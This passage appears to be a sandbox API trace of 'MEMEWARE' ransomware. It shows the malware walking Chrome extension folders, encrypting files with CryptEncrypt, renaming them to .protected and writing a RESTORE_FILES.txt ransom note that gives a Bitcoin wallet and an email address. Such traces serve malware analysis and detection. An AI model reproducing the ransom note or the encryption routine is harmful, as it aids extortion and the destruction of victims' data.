data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.866] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json") returned 157 [0079.866] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.866] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json") returned 157 [0079.866] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.866] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json") returned 157 [0079.866] StrStrW 
(lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.866] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.867] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.867] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.867] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.867] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.867] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.867] CloseHandle (hObject=0x168) returned 1 [0079.867] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.protected") returned 167 [0079.867] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.protected")) returned 1 [0079.868] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.868] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.868] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\RESTORE_FILES.txt") returned 161 [0079.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.869] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.869] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.869] lstrlenA (lpString="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") returned 684 [0079.869] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0079.870] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.870] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.870] CloseHandle (hObject=0x164) returned 1 [0079.870] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.870] lstrcmpiW (lpString1="sl", lpString2="Windows") returned -1 [0079.870] lstrcmpiW (lpString1="sl", lpString2="Program Files") returned 1 [0079.870] lstrcmpiW (lpString1="sl", lpString2="Program Files (x86)") returned 1 [0079.870] lstrcmpiW (lpString1="sl", lpString2="$Recycle.bin") returned 1 [0079.870] lstrcmpiW (lpString1="sl", lpString2="System Volume Information") returned -1 [0079.870] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl") returned 143 [0079.870] lstrcmpW (lpString1="sl", lpString2=".") returned 1 [0079.870] lstrcmpW (lpString1="sl", lpString2="..") returned 1 [0079.870] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\*") returned 145 [0079.870] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.870] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0079.870] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.870] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.870] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.871] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.871] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\.") returned 145 [0079.871] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.871] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.871] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.871] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.871] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.871] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.871] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.871] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\..") returned 146 [0079.871] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.871] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.871] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.871] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.871] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.871] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0079.871] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.871] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.871] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json") returned 157 [0079.871] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.871] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.871] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.871] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.871] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.872] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json") returned 157 [0079.872] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.872] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json") returned 157 [0079.872] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.872] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json") returned 157 [0079.872] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.872] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.873] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.873] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.873] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.873] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.873] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.873] CloseHandle (hObject=0x168) returned 1 [0079.873] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.protected") returned 167 [0079.873] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.protected")) returned 1 [0079.874] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.874] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.874] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\RESTORE_FILES.txt") returned 161 [0079.874] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.875] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.875] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.876] lstrlenA (lpString="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") returned 684 [0079.876] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.876] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.876] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.876] CloseHandle (hObject=0x164) returned 1 [0079.876] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.876] lstrcmpiW (lpString1="sr", lpString2="Windows") returned -1 [0079.876] lstrcmpiW (lpString1="sr", lpString2="Program Files") returned 1 [0079.876] lstrcmpiW (lpString1="sr", lpString2="Program Files (x86)") returned 1 [0079.876] lstrcmpiW (lpString1="sr", lpString2="$Recycle.bin") returned 1 [0079.876] lstrcmpiW (lpString1="sr", lpString2="System Volume Information") returned -1 [0079.876] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr") returned 143 [0079.876] lstrcmpW (lpString1="sr", lpString2=".") returned 1 [0079.876] lstrcmpW (lpString1="sr", lpString2="..") returned 1 [0079.876] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\*") returned 145 [0079.876] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.877] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.877] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.877] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.877] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.877] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.877] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\.") returned 145 [0079.877] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.877] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.877] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.877] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.877] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.877] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.877] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.878] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\..") returned 146 [0079.878] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.878] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.878] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.878] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.878] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.878] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.878] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.878] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.878] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json") returned 157 [0079.878] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.878] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.878] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.878] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.878] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json") returned 157 [0079.879] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.879] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json") returned 157 [0079.879] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.879] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json") returned 157 [0079.879] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.879] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.880] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.880] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.880] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.880] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.880] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, 